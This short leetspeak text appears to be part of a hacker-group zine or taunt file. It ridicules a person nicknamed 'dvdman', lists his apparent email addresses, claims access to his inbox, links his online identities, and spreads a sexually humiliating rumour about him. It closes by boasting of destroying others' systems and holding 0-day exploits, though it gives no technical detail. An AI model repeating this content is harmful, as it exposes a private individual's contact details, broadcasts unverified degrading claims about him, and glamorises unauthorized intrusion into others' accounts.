H4r!@# HAHAHAHAHAHAHHAHAH@#$H@!#$!@#$!@#!@#!$^O)(*&^%$ AHHAHAHAHAHAHH@#@#H%% H4R H4R H4RH 4HRH4RH 4RH4 H4HRH4R!@#!@$& HA HAHAHA AHAHAHAHHAHA#%!! -~-~-~ th3r3 1z mult1pl3 3m41lz fr0m dvdman9999@aol.com 4sw3ll 4s fr0m @hale.com 1n jhjem@hotmail.com's 1nb0x. h3 4ls0 t3llz p30pl3 t0 c0nt4ct h1m 0n 41m 0r msn, us1ng dvdm4n'z scr33n n4m3z. jhjem is dvdman. d0nt l3t h1m c0nv1nc3 y0u 0th3rw1z3. -~-~-~ n3wz fl4sh. 1t s33mz l1k3 dvdm4n d03znt r34lly h4v3 a gf.. h0no h4z c4ught h1m buy1ng w0m3n'z p4nt13z 0ff 3b4y t0 dr3zz 1n. h4r h4r h4r!@#!$ 28.txt -~-~-~ 0utr0 0ur 3nd 1z n34r. w3 h4v3 fuq3d, w1th th3 3v3r str0ng & p0w3rful 1U4. th3 sk1llz 0f d4rp4n3t 4r3 juzt t0 gr34t t0 d3ny! th3y w1ll h4q & sl4sh y0ur b0x 1n 10 m1ll1s3c0ndz.. w1th0ut 4 s1ngl3 typ0! 3y3 0nc3 s4w c4m3l 0wn 4 t3l3c0m c0mp4ny w1th A r4z0r, 2 p4qz 0f m4rb0r0z & s0m3 l3ft 0v3r l1pst1ck! 3y3 scr33n'd w1th 4g3nt0rng t0 h3lp h1m r3g1st3r f0r th3 sp3ch14l 0lymp1qz m3ss4g3 b04rd w1th juzt h1z r1s1ngn3t sh3ll 4nd lynx! 3y3 4ls0 h34rd A rum0r th4t th3 3v3r f34r3d x0rt br0k3 0ut 0f pr1s0n w1th j0k3r juzt s0 th3y c0uld w4tch A m4n'z b0x g3t rm'd. th0se guyz 4r3 fuck1ng 3l1t3. th3y 4r3 tru3ly h4rdc0re. 4ll w3 d0 1z t4lk sh1t, w3 c4nt h4ck. w3 d0nt fuck1ng 0wn p30pl3. w3 d0nt fuck1ng rm p30pl3. w3 d0nt fuck1ng h4v3 4ll th3 0d4y 3xpl01tz... 0h w41t, w3 d0. y0u guyz 4r3 fuck3d.